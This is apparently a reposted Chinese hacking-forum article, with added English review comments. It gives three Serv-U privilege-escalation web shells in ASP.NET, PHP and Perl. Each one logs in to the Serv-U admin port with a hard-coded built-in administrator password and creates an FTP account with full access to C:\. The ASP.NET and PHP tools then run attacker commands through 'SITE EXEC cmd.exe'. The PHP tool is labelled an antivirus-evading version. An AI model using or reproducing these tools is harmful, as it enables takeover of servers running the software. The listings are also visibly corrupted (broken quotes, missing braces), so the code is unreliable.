

.NET版本Serv-U提权程序

时间:2011-01-17 10:41来源: 作者:小糊涂神 点击:

<%@ Page Language="VB" Debug="true" %> 
<%@ import Namespace="System.Net.Sockets" %> 
<script runat="server"> 

    ’  
    ’ Love, Where are you ? 
     
    ' Click handler for the "Start" button of the form below. Reads the Serv-U 
    ' administrative credentials, the admin port and a command from the form, 
    ' then drives two loopback FTP sessions against the local Serv-U service. 
    ' Security review: this is a local privilege-escalation web shell. Every 
    ' step is visible on the Serv-U side (administrative login on the admin 
    ' port, -DELETEDOMAIN/-SETDOMAIN/-SETUSERSETUP under SITE MAINTENANCE, 
    ' then "site exec" on the temporary domain) and is what a defender should 
    ' alert on in the Serv-U logs. The page also echoes the credentials and 
    ' every command and reply into the HTTP response (see Send/Rec). 
    Sub BTN_Start_Click(sender As Object, e As EventArgs) 
        Dim Usr As String = Text_Name.Text 
        Dim pwd As String = Text_PWD.Text 
        ' Implicit String -> Int32 narrowing (needs Option Strict Off); a 
        ' non-numeric port throws here, outside any Try. 
        Dim Port As Int32 = Text_Port.Text 
        Dim Command As String = Text_cmd.Text 
     
        ' Plain FTP login lines for the administrative connection. 
        Dim LoginUser As String = "User " & Usr & vbcrlf 
        Dim LoginPass As String = "Pass " & pwd & vbcrlf 
        ' SITE MAINTENANCE records: create a temporary domain "cctv" listening 
        ' on 0.0.0.0:43859, the matching delete record, and a user 
        ' "lake"/"admin123" whose home is c:\ with RWAMELCDP access to it. 
        ' As in the PHP and Perl listings further down, the last field of each 
        ' record (" TZOKey=", " PortNo=", " Access=") is prefixed with a space 
        ' instead of "-". 
        Dim NewDomain As String = "-SETDOMAIN" & vbcrlf & "-Domain=cctv|0.0.0.0|43859|-1|1|0" & vbcrlf & "-TZOEnable=0" & vbcrlf & " TZOKey=" & vbcrlf 
        Dim DelDomain As String = "-DELETEDOMAIN" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & " PortNo=43859" & vbcrlf 
        Dim NewUser AS String = "-SETUSERSETUP" & vbcrlf & "-IP=0.0.0.0" & vbcrlf & "-PortNo=43859" & vbcrlf & "-User=lake" & vbcrlf & "-Password=admin123" & vbcrlf & _ 
                    "-HomeDir=c:\\" & vbcrlf & "-LoginMesFile=" & vbcrlf & "-Disable=0" & vbcrlf & "-RelPaths=1" & vbcrlf & _ 
                    "-NeedSecure=0" & vbcrlf & "-HideHidden=0" & vbcrlf & "-AlwaysAllowLogin=0" & vbcrlf & "-ChangePassword=0" & vbcrlf & _ 
                    "-QuotaEnable=0" & vbcrlf & "-MaxUsersLoginPerIP=-1" & vbcrlf & "-SpeedLimitUp=0" & vbcrlf & "-SpeedLimitDown=0" & vbcrlf & _ 
                    "-MaxNrUsers=-1" & vbcrlf & "-IdleTimeOut=600" & vbcrlf & "-SessionTimeOut=-1" & vbcrlf & "-Expire=0" & vbcrlf & "-RatioUp=1" & vbcrlf & _ 
                    "-RatioDown=1" & vbcrlf & "-RatiosCredit=0" & vbcrlf & "-QuotaCurrent=0" & vbcrlf & "-QuotaMaximum=0" & vbcrlf & _ 
                    "-Maintenance=System" & vbcrlf & "-PasswordType=Regular" & vbcrlf & "-Ratios=None" & vbcrlf & " Access=c:\\|RWAMELCDP" & vbcrlf 
        Dim Quit As String = "QUIT" & vbcrlf 
        Dim MAINTENANCE As String = "SITE MAINTENANCE" & vbcrlf 
     
        ' NOTE(review): the next line begins with a typographic apostrophe 
        ' (U+2019), not the VB comment character, so as listed it would not 
        ' compile; the two header lines above this Sub have the same defect. 
        ' Most likely an artifact of how the page was extracted. 
        ’Dim client As New TcpClient 
        ' Connection 1: the Serv-U administrative port on loopback. 
        Dim tcpClient As New TcpClient() 
        Try 
            tcpClient.Connect("127.0.0.1", port) 
        Catch eee As Exception 
            ' Full exception text (including stack trace) goes to the page. 
            response.write(eee.ToString()) 
            response.end 
        End Try 
        tcpClient.ReceiveBufferSize = 1024 
        Dim networkStream As NetworkStream = tcpClient.GetStream() 
        ' Lock-step exchange: one Rec (a single 1024-byte read) after each 
        ' Send. Replies are echoed but never parsed, so a rejected login or 
        ' maintenance command is not detected and the sequence continues. 
        Rec(networkStream) 
        Send(networkStream, LoginUser) 
        Rec(networkStream) 
        Send(networkStream, LoginPass) 
        Rec(networkStream) 
        Send(networkStream, MAINTENANCE) 
        Rec(networkStream) 
        Send(networkStream, DelDomain) 
        Rec(networkStream) 
        Send(networkStream, NewDomain) 
        Rec(networkStream) 
        Send(networkStream, NewUser) 
        Rec(networkStream) 
               ' Connection 2: log in to the temporary domain on 43859 as the 
               ' user just created and submit the form command via "site exec". 
               Dim tcpClient2 As New TcpClient() 
               Try 
                   tcpClient2.Connect("127.0.0.1", 43859) 
               Catch eee As Exception 
                   response.write(eee.ToString()) 
                   response.end 
               End Try 
               tcpClient2.ReceiveBufferSize = 1024 
               Dim networkStream2 As NetworkStream = tcpClient2.GetStream() 
               Rec(networkStream2) 
               Send(networkStream2, "User lake" & vbcrlf) 
               Rec(networkStream2) 
               Send(networkStream2, "pass admin123" & vbcrlf) 
               Rec(networkStream2) 
               Send(networkStream2, "site exec " & Command & vbcrlf) 
               Rec(networkStream2) 
               tcpClient2.Close() 
        ' Cleanup: remove the temporary domain again and end the admin session. 
        ' The domain therefore exists only briefly; the admin-port login and 
        ' the SETDOMAIN/SETUSERSETUP records are the durable trace. 
        Send(networkStream, DelDomain) 
        Rec(networkStream) 
        Send(networkStream, Quit) 
        Rec(networkStream) 
        tcpClient.Close() 
    End Sub 
     
     
     
    ' Reads one chunk from the stream and echoes it to the page as "out:". 
    ' o is late-bound (As Object); every caller passes a NetworkStream. 
    ' Dim bytes(1024) declares 1025 elements; Read fills at most the first 
    ' 1024 and its return value (bytes actually received) is discarded, so 
    ' the decoded string carries the untouched trailing bytes. A single Read 
    ' is also not guaranteed to deliver a complete FTP reply. 
    Sub Rec(o As Object) 
       If o.CanRead Then 
          Dim bytes(1024) As Byte 
          o.Read(bytes, 0, 1024) 
          Dim returndata As String = Encoding.ASCII.GetString(bytes) 
          ' Server output is written into the HTML unescaped. 
          response.Write("out:" & returndata & "<br>") 
       Else 
          response.Write("What’s wrong ?") 
       End If 
    End Sub 
     
    ' ASCII-encodes data, writes it to the stream and echoes it to the page 
    ' as "in:". Because the USER/PASS lines pass through here, the Serv-U 
    ' administrative username and password are reflected, unescaped, into 
    ' the rendered HTML response. 
    Sub Send(o As Object,data As String) 
       If o.CanWrite Then 
          Dim sendBytes As [Byte]() = Encoding.ASCII.GetBytes(data) 
          o.Write(sendBytes, 0, sendBytes.Length) 
          response.write("in: " & data & "<br>") 
       Else 
          response.Write("What’s wrong ?") 
       End If 
    End Sub 

</script> 
<html> 
<head> 
</head> 
<body> 
    <form runat="server"> 
        <p> 
            <asp:Label id="Label1" runat="server" width="353px" forecolor="Blue">from Serv-U 2 
            admin by lake2</asp:Label> 
        </p> 
        <p> 
            <asp:Label id="Label2" runat="server" width="40px">Name</asp:Label> 
            <asp:TextBox id="Text_Name" runat="server" Width="152px">LocalAdministrator</asp:TextBox> 
            <br /> 
            <asp:Label id="Label3" runat="server" width="40px">PWD</asp:Label> 
            <asp:TextBox id="Text_PWD" runat="server">#l@$ak#.lk;0@P</asp:TextBox> 
            <br /> 
            <asp:Label id="Label4" runat="server" width="40px">Port</asp:Label> 
            <asp:TextBox id="Text_Port" runat="server">43958</asp:TextBox> 
            <br /> 
            <asp:Label id="Label5" runat="server" width="40px">cmd</asp:Label> 
            <asp:TextBox id="Text_cmd" runat="server"></asp:TextBox> 
        </p> 
        <p> 
            <asp:Button id="BTN_Start" onclick="BTN_Start_Click" runat="server" Text="Start"></asp:Button> 
        </p> 
        <p> 
            <hr /> 
            <!-- Insert content here --> 
        </p> 
    </form> 
</body> 
</html> 

2.PHP版Serv-U提权木马 

<?PHP 
/** 
注释免杀版本 
**/ 
// 
//Codez begin 
// 
//判断magic_quotes_gpc的值 
// Undo magic_quotes escaping on $_GET so the values are passed to Serv-U 
// verbatim. NOTE(review): the closing "}" of this if, and of the two ifs 
// below, are absent from this listing (most likely stripped on extraction); 
// get_magic_quotes_gpc() itself no longer exists in PHP 8. 
if (get_magic_quotes_gpc()) { 
$_GET = stripslashes_array($_GET); 
 
// Defaults. $adminuser/$adminpass are the historical Serv-U built-in local 
// administrator credentials; the whole technique depends on Serv-U still 
// accepting them on the loopback admin port. Whether an installed version 
// does so must be checked against the vendor's release notes. 
// NOTE(review): the quotes on these lines are typographic (U+2019), not 
// PHP string delimiters, and the $adminpass line lacks a semicolon as 
// listed — further extraction damage. 
$addr = ’0.0.0.0’; 
$ftpport = 21; 
$adminport = 43958; 
$adminuser = ’LocalAdministrator’; 
$adminpass = ’#l@$ak#.lk;0@P’
$user = ’wofeiwo’; 
$password = ’wrsky’; 
$homedir = ’C:\\’; 
$dir = ’C:\\WINNT\\System32\\’; 
 
// Any query string at all replaces every default, unvalidated; missing 
// keys become null. $adminport and $ftpport flow straight into fsockopen() 
// in up()/ftpcmd() below. 
if ($_GET){ 
$addr = $_GET[’addr’] ; 
$ftpport = $_GET[’ftpport’] ; 
$adminport = $_GET[’adminport’] ; 
$adminuser = $_GET[’adminuser’] ; 
$adminpass = $_GET[’adminpass’] ; 
$user = $_GET[’user’] ; 
$password = $_GET[’password’] ; 
$homedir = $_GET[’homedir’] ; 
if ($_GET[’dir’]){ 
$dir = $_GET[’dir’] ; 
 

?> 

<!-- 主文件开始 //--> 
<html> 
<head> 
<title>-=<Serv-U All Version本地提升权限Exp10it Ver 1.5 By 我非我[F.S.T] 修改免杀版>=-</title> 
<meta content="text/html; charset=gb2312" http-equiv="Content-Type"> 
<STYLE TYPE="text/css"> 
b {font-family : Verdana, sans-serif;font-size : 14px;} 
body,td,p,pre { 
font-family : Verdana, sans-serif;font-size : 12px; 

input { 
font-family: "Verdana"; 
font-size: "11px"; 
BACKGROUND-COLOR: "#FFFFFF"; 
height: "18px"; 
border: "1px solid #666666"; 

</STYLE> 
</head> 
<body bgcolor="#EEEEEE" text="#000000" link="#006699" vlink="#5493B4"> 

<center><b>Serv-U All Version本地提升权限Exp10it Ver 1.5</b> 
<br><br> 
<b>添加Serv-U用户部分</b> 
<br> 
<form action="<?=$_SERVER[’PHP_SELF’]?>" method="get"> 
<table width="660" border="0" cellpadding="0"> 
<tr><td width="300" align="center">主机IP:</td> <td width="360" align="center"><input name="addr" type="text" class="INPUT" value="<?=$addr?>"></td></tr> 
<tr><td width="300" align="center">主机Ftp端口:</td> <td width="360" align="center"><input name="ftpport" type="text" class="INPUT" value="<?=$ftpport?>"></td></tr> 
<tr><td width="300" align="center">主机Ftp管理端口:</td> <td width="360" align="center"><input name="adminport" type="text" class="INPUT" value="<?=$adminport?>"></td></tr> 
<tr><td width="300" align="center">主机Ftp管理用户:</td> <td width="360" align="center"><input name="adminuser" type="text" class="INPUT" value="<?=$adminuser?>"></td></tr> 
<tr><td width="300" align="center">主机Ftp管理密码:</td> <td width="360" align="center"><input name="adminpass" type="text" class="INPUT" value="<?=$adminpass?>"></td></tr> 
<tr><td width="300" align="center">添加的用户名:</td> <td width="360" align="center"><input name="user" type="text" class="INPUT" value="<?=$user?>"></td></tr> 
<tr><td width="300" align="center">添加的用户名密码:</td><td width="360" align="center"><input name="password" type="password" class="INPUT" value="<?=$password?>"></td></tr> 
<tr><td width="300" align="center">用户主目录(别忘了写"\"):</td> <td width="360" align="center"><input name="homedir" type="text" class="INPUT" value="<?=$homedir?>"></td></tr> 
<tr><td width="300" align="center"><input name="action" type="hidden" value="up"></td></tr> 
<tr><td width="300" align="center"><input type="submit" class="INPUT" value="添加"></td></tr> 
</form></tr> 
</table> 
<hr width="660"><br> 
<textarea cols="60" rows="10" readonly>命令回显: 
<?php 

//添加用户 
// "添加" form submitted: create the Serv-U account (output lands in the 
// readonly textarea above). Closing "}" missing from the listing. 
if ($_GET[’action’]=="up"){ 
up($addr,$ftpport,$adminport,$adminuser,$adminpass,$user,$password,$homedir); 

?> 

</textarea></center><br><hr width="660"> 
<center><b>执行命令部分</b><br> 
<form action="<?=$_SERVER[’PHP_SELF’]?>" method="get"> 
<table width="660" border="0" cellpadding="0"> 
<tr><td width="300" align="center">主机Ftp端口:</td> <td width="360" align="center"><input name="ftpport" type="text" class="INPUT" value="<?=$ftpport?>"></td></tr> 
<tr><td width="300" align="center">用户名:</td> <td width="360" align="center"><input name="user" type="text" class="INPUT" value="<?=$user?>"></td></tr> 
<tr><td width="300" align="center">用户名密码:</td><td width="360" align="center"><input name="password" type="password" class="INPUT" value="<?=$password?>"></td></tr> 
<tr><td width="300" align="center">系统路径(别忘了写"\"):</td><td width="360" align="center"><input name="dir" type="text" class="INPUT" value="<?=$dir?>"></td></tr> 
<tr><td width="300" align="center">执行的命令:</td> <td width="360" align="center"><input name="cmd" type="text" class="INPUT" value="<?=$_GET[’cmd’]?>"></td></tr> 

<tr><td width="300" align="center"><input name="action" type="hidden" value="execute"></td></tr> 
<tr><td width="300" align="center"><input type="submit" class="INPUT" value="执行"></td></tr> 
</form></tr></table><hr width="660"><br> 
<textarea cols="60" rows="10" readonly>命令回显: 
<?php 

//执行命令 
// "执行" form submitted: $_GET['cmd'] is handed to ftpcmd() unfiltered and 
// is also reflected unescaped into the form's value attribute above. 
// Closing "}" missing from the listing. 
if ($_GET[’action’]=="execute"){ 
ftpcmd($ftpport,$user,$password,$dir,$_GET[’cmd’]); 

?> 
</textarea> 
</center><br><hr width="660"> 
<i><center>Copycenter (C) 2004 <B style=’color:black;background-color:#ffff66’>我非我</B> All centers Reserved. <br> 
</center></i> 
</body> 
</html> 
<!-- 主文件结束 //--> 
<?php 

//添加用户主函数定义 
// Adds a Serv-U account through the administrative port on loopback. 
// Logs in with the administrative credentials, enters SITE MAINTENANCE and 
// sends one -SETUSERSETUP record describing the new user, then QUITs and 
// echoes everything the server answered. Timing is by fixed sleep(1) 
// calls; replies are never checked, so failures only show in the echo. 
// NOTE(review): the closing braces of the while, the else and the function 
// are missing from this listing, and unlike ftpcmd() there is no fclose(). 
// Defender view: an admin-port login followed by SETUSERSETUP with 
// -Maintenance=System from 127.0.0.1 is the signature to look for. 
function up($addr,$ftpport,$adminport,$adminuser,$adminpass,$user,$password,$homedir){ 
// 8-second connect timeout; $adminport comes straight from the request. 
$fp = fsockopen ("127.0.0.1", $adminport, $errno, $errstr, 8); 
if (!$fp) { 
echo "$errstr ($errno)<br>\n"; 
} else { 
fputs ($fp, "USER ".$adminuser."\r\n"); 
sleep (1); 
fputs ($fp, "PASS ".$adminpass."\r\n"); 
sleep (1); 
fputs ($fp, "SITE MAINTENANCE\r\n"); 
sleep (1); 
// One -SETUSERSETUP record: account $user/$password on the FTP domain at 
// $addr:$ftpport, home directory $homedir, no quotas or limits. 
// -Maintenance=System presumably grants maintenance (administrative) 
// rights to the new account — confirm against Serv-U documentation. 
fputs ($fp, "-SETUSERSETUP\r\n"); 
fputs ($fp, "-IP=".$addr."\r\n"); 
fputs ($fp, "-PortNo=".$ftpport."\r\n"); 
fputs ($fp, "-User=".$user."\r\n"); 
fputs ($fp, "-Password=".$password."\r\n"); 
fputs ($fp, "-HomeDir=".$homedir."\r\n"); 
fputs ($fp, "-LoginMesFile=\r\n"); 
fputs ($fp, "-Disable=0\r\n"); 
fputs ($fp, "-RelPaths=0\r\n"); 
fputs ($fp, "-NeedSecure=0\r\n"); 
fputs ($fp, "-HideHidden=0\r\n"); 
fputs ($fp, "-AlwaysAllowLogin=0\r\n"); 
fputs ($fp, "-ChangePassword=1\r\n"); 
fputs ($fp, "-QuotaEnable=0\r\n"); 
fputs ($fp, "-MaxUsersLoginPerIP=-1\r\n"); 
fputs ($fp, "-SpeedLimitUp=-1\r\n"); 
fputs ($fp, "-SpeedLimitDown=-1\r\n"); 
fputs ($fp, "-MaxNrUsers=-1\r\n"); 
fputs ($fp, "-IdleTimeOut=600\r\n"); 
fputs ($fp, "-SessionTimeOut=-1\r\n"); 
fputs ($fp, "-Expire=0\r\n"); 
fputs ($fp, "-RatioUp=1\r\n"); 
fputs ($fp, "-RatioDown=1\r\n"); 
fputs ($fp, "-RatiosCredit=0\r\n"); 
fputs ($fp, "-QuotaCurrent=0\r\n"); 
fputs ($fp, "-QuotaMaximum=0\r\n"); 
fputs ($fp, "-Maintenance=System\r\n"); 
fputs ($fp, "-PasswordType=Regular\r\n"); 
fputs ($fp, "-Ratios=None\r\n"); 
// Last field of the record: space-prefixed instead of "-", full 
// RWAMELCDP access to $homedir. 
fputs ($fp, " Access=".$homedir."|RWAMELCDP\r\n"); 
fputs ($fp, "QUIT\r\n"); 
sleep (1); 
// Echo the server's replies (unescaped) until it closes the connection. 
while (!feof($fp)) { 
echo fgets ($fp,128); 


//执行命令主函数定义 
// Runs $cmd through the Serv-U FTP port on loopback: logs in as the account 
// created by up(), issues "SITE EXEC <dir>cmd.exe /c <cmd>" and echoes the 
// replies. $cmd is the raw query parameter; nothing is validated. 
// NOTE(review): the closing braces of the while, the else and the function 
// are missing from this listing. 
// Defender view: any SITE EXEC in the Serv-U log, especially from 
// 127.0.0.1 right after a new-account creation, is the indicator; the 
// resulting process runs with the privileges of the Serv-U service. 
function ftpcmd($ftpport,$user,$password,$dir,$cmd){ 
 
// 8-second connect timeout; $ftpport comes straight from the request. 
$conn_id = fsockopen ("127.0.0.1", $ftpport, $errno, $errstr, 8); 
 
if (!$conn_id) { 
echo "$errstr ($errno)<br>\n"; 
} else { 
fputs ($conn_id, "USER ".$user."\r\n"); 
sleep (1); 
fputs ($conn_id, "PASS ".$password."\r\n"); 
sleep (1); 
// $dir is expected to end in a backslash (see the form hint); it is 
// concatenated, not joined, so a missing one breaks the path. 
fputs ($conn_id, "SITE EXEC ".$dir."cmd.exe /c ".$cmd."\r\n"); 
fputs ($conn_id, "QUIT\r\n"); 
sleep (1); 
// Echo the server's replies (unescaped) until it closes the connection. 
while (!feof($conn_id)) { 
echo fgets ($conn_id,128); 
 
fclose($conn_id); 

//去除转义字符 
// Recursively strips magic-quotes backslashes from an array in place and 
// also returns it. Keys named argc/argv, and all-uppercase non-numeric 
// keys (server/environment style), are left untouched. 
// NOTE(review): each() was deprecated in PHP 7.2 and removed in 8.0; the 
// closing braces of the inner ifs, the while and the function are missing 
// from this listing, and the quotes are typographic (U+2019). 
function stripslashes_array(&$array) { 
while (list($key,$var) = each($array)) { 
if ($key != ’argc’ && $key != ’argv’ && (strtoupper($key) != $key || ’’.intval($key) == "$key")) { 
if (is_string($var)) { 
$array[$key] = stripslashes($var); 
 
if (is_array($var)) { 
$array[$key] = stripslashes_array($var); 
 
 
 
return $array; 

?> 

3.Perl版本的serv-U提权程序 

#!/usr/bin/perl 
# Perl/CGI variant of the Serv-U account-creation step. Unlike the PHP 
# version above, this listing only adds an account; there is no SITE EXEC 
# step. All values are hard-coded; nothing is read from the request. 
# NOTE(review): the module name on the next line (and at the second "use" 
# below) is garbled as listed — a single colon is not valid Perl package 
# syntax — presumably an extraction artifact. 
use I:Socket; 
 
# CGI response header, written raw so it is emitted before anything else 
# (27 bytes = "Content-type: text/html" plus the two CRLFs). 
binmode(STDOUT); 
syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27); 
 
# $adminuser/$adminpass are the historical Serv-U built-in local 
# administrator credentials (same as in the PHP listing). 
# NOTE(review): the $adminpass line lacks a semicolon and uses typographic 
# quotes as listed. 
$addr = "127.0.0.1"; 
$ftpport = 21; 
$adminport = 43958; 
$adminuser = "LocalAdministrator"; 
$adminpass = ’#l@$ak#.lk;0@P’
$user = "Andyower"; 
$password = "haika"; 
$homedir = ’C:\\’; 
$dir = ’C:\\WINNT\\System32\\’; 
 
use I:Socket::INET; 
 
# Loopback connection to the Serv-U administrative port; dies on failure. 
$sock = I:Socket::INET->new("127.0.0.1:$adminport") || die "fail"; 
 
print "Andyower制作<br><br>"; 
 
# Administrative login, SITE MAINTENANCE, then one -SETUSERSETUP record 
# (same field set as the PHP up() function). Fixed sleep(1) pacing; 
# replies are not read until the end, so errors are never acted upon. 
print $sock "USER $adminuser\r\n"; 
sleep (1); 
print $sock "PASS $adminpass\r\n"; 
sleep(1); 
print $sock "SITE MAINTENANCE\r\n"; 
sleep(1); 
print $sock "-SETUSERSETUP\r\n"; 
print $sock "-IP=".$addr."\r\n"; 
print $sock "-PortNo=".$ftpport."\r\n"; 
print $sock "-User=".$user."\r\n"; 
print $sock "-Password=".$password."\r\n"; 
print $sock "-HomeDir=".$homedir."\r\n"; 
print $sock "-LoginMesFile=\r\n"; 
print $sock "-Disable=0\r\n"; 
print $sock "-RelPaths=0\r\n"; 
print $sock "-NeedSecure=0\r\n"; 
print $sock "-HideHidden=0\r\n"; 
print $sock "-AlwaysAllowLogin=0\r\n"; 
print $sock "-ChangePassword=1\r\n"; 
print $sock "-QuotaEnable=0\r\n"; 
print $sock "-MaxUsersLoginPerIP=-1\r\n"; 
print $sock "-SpeedLimitUp=-1\r\n"; 
print $sock "-SpeedLimitDown=-1\r\n"; 
print $sock "-MaxNrUsers=-1\r\n"; 
print $sock "-IdleTimeOut=600\r\n"; 
print $sock "-SessionTimeOut=-1\r\n"; 
print $sock "-Expire=0\r\n"; 
print $sock "-RatioUp=1\r\n"; 
print $sock "-RatioDown=1\r\n"; 
print $sock "-RatiosCredit=0\r\n"; 
print $sock "-QuotaCurrent=0\r\n"; 
print $sock "-QuotaMaximum=0\r\n"; 
print $sock "-Maintenance=System\r\n"; 
print $sock "-PasswordType=Regular\r\n"; 
print $sock "-Ratios=None\r\n"; 
# Last field of the record: space-prefixed, full RWAMELCDP access to $homedir. 
print $sock " Access=".$homedir."|RWAMELCDP\r\n"; 
print $sock "QUIT\r\n"; 
 
# Slurp every reply line until the server closes after QUIT, dump them 
# (unescaped) into the HTML, and exit. 
@ret=<$sock>; 
print "@ret"; 
 
close(STDERR); 
close(STDOUT); 
exit; 

 

本篇文章来源于 新世纪网安基地 (www.520hack.com) 原文出处:http://www.520hack.com/Article/Text4/201002/17619.html

(责任编辑:小糊涂神)